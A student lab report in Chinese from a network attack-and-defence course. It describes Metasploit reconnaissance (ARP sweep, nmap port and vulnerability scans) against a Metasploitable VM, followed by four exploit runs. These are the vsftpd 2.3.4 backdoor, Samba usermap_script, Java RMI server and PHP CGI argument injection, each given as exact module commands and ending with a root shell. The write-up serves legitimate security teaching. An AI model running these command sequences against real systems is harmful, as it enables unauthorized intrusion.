20232410 2025-2026-1 《网络与系统攻防技术》实验六实验报告

1.实验内容
掌握Metasploit的基础操作:模块搜索(search)、加载(use)、参数配置(set)、攻击执行(exploit/run)及会话管理(sessions)。
理解4类漏洞的核心原理,明确漏洞与靶机开放端口、服务的对应关系。
能够通过命令行验证攻击结果,确认是否成功获取靶机操作权限。

2.实验过程
2.1前期渗透
ifconfig得到metasploitable靶机的ip地址为192.168.81.166 。
image

在kali中打开msfconsole,输入以下命令。
search arp_sweep
use 0
set RHOSTS 192.168.81.0/24
run
扫描靶机。
image

可以在命令行中输入nmap -p 1-2048 192.168.81.166查看靶机开放的端口。
image

接着在命令行中输入nmap -script=vuln 192.168.81.166对靶机的漏洞进行扫描.。
image
image
image

2.2Vsftpd源码包后门漏洞(21端口)
在msfconsole中输入以下命令。
use exploit/unix/ftp/vsftpd_234_backdoor
set RHOSTS 192.168.81.166
run
再输入shell相关命令,可以看到已经成功获取靶机的shell。
image

2.3SambaMS-RPC Shell命令注入漏洞(端口139)
在msfconsole中输入以下命令。
use exploit/multi/samba/usermap_script
set RHOST 192.168.81.166
exploit
再输入uname -a命令,可以看到已经成功获取靶机的shell.
image

2.4Java RMI SERVER命令执行漏洞
之前已经扫描过1099端口并确定其存在漏洞且开放,在msfconsole中输入以下命令。
use exploit/multi/misc/java_rmi_server
set RHOST 192.168.81.166
exploit
shell
输入命令whoami,得到结果root,说明攻击成功。
image

2.5PHP CGI参数执行注入漏洞
在msfconsole中输入以下命令。
use exploit/multi/http/php_cgi_arg_injection
set RHOST 192.168.81.166
exploit
shell
可以执行ls命令,攻击成功。
image

3.问题及解决方案
问题1:在一开始扫描靶机时,显示“不允许的操作”,扫描失败。
image

问题解决1:使用sudo su - 命令切换至root权限,成功解决。
4.学习感悟、思考等
通过本次Metasploit实践,我从前期的主机发现、端口扫描等信息搜集,到依次利用Vsftpd、Samba 等4类漏洞完成渗透,清晰掌握了MSF的模块加载、参数配置、攻击执行等核心操作。整个过程让我直观理解了漏洞原理与实际利用的关联,对渗透测试流程有了更具象的认知。

posted @ 2025-11-17 20:54  20232410朱静泽a  阅读(0)  评论(0)    收藏  举报